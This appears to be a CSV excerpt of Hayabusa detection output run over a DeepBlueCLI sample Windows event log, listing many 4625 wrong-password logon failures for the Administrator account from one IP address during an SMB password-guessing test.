+2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JIMTGRC5IQlkrG9c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NYcLsxwbg8LkGCuQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kmttijRBtXqEbU0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXC3hYI1Gin59gvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hQiozAIr9Jgklmks | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O598IvZRpbdU1liO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xlmYWrAnn3sUNSRk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aAAkO0uOGIq8zVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 26K4BIpgUbBNWbDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: moW3Ts7edqoQ9XeU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8C4d3xE0QkWywbf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K1EgYFhtgrcjtcXM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7avpgQeA0KCIme9Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YFgmt3OEw4cDfPhG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OqITdE5K63nJg9tg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zBs4fYCiprxgDd43 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtBD0Q2szeURxMYA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KPUi2NhPP92Rs3hy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PrbMf9E0fOuwIB8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 807zsxQ9WETO9YIp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGMJKRYUlmijJV40 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xv33to031A0fQzX2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IT0bzycur7HXFeLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kyY2K7tT0HgQ1ZL3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6aexuFPH6FyEZ1bN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o8Iojas6sznqlYUE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U2SnliYkmx59ACSM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2plWY1GZHilHv5Vh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XIfmqihMJdPVz80p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Odg692Eyde8md0t7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gsQNvf5HkRQnbDul | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: il2DGq3bzfwGuJN4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9OsQFOcIyougrx0E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gR8wpQrGYzd4NrBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.282 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KFjRsjWXbEPs9m1I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wbjudOy3rWefzAIv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Q4gc8keCTv2HeE3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SmsaxHrHYuofUhAH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CvhWasTJYmChfsNU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DszGfEo9aua2y5UC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lZPScjxczbrcJuvJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucpjxJV4rBXOxy4e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BmTtDfX05VsKFrON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhWSUkQhv089RSfJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i8RXCiXQYgjuPO78 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfB3u3Np38FOw6hc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I9GcSmto4jdCIw6H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HsogJdHUcldt7JeH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IUbkohKtCy6joOBY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9ZFyYxBrKnz652Co | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQ2MHr71xALFHJqN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cgjHOgEYRLQiJX75 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QXLjSNCeDAaX4ttQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: np6hwdqnWLJawVn9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: adqqChrYx3lZ0BAa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1GTXkOnNYTws1MiC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.266 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5QUvFvCM6AJhKjXe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NiVgC8oJ5W2Xr3t0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hXfhdrbLnNOGDqy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcjMGbrHQHxIhSSh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LDYPTYHHKAe39GjM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PF3H6LE6MqFjVWx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LLTReOoxRa7UAhT3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jqtqwAPBiBfaHNpv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jmisFXzDpOILUhIX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W5UHqVVAYK08FWit | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PKHLHN59FDnD92Sm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.829 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ohAKPRGvg1JCQ91y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pxdcrng84HEG39nJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lFGXFxHPbxDTGmiN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tyFnafBgzoLQWTQR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2IjLjxkd2pX4moFy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9vqYC4KotCYTcQv5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qtHcYFIOHglQFb60 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
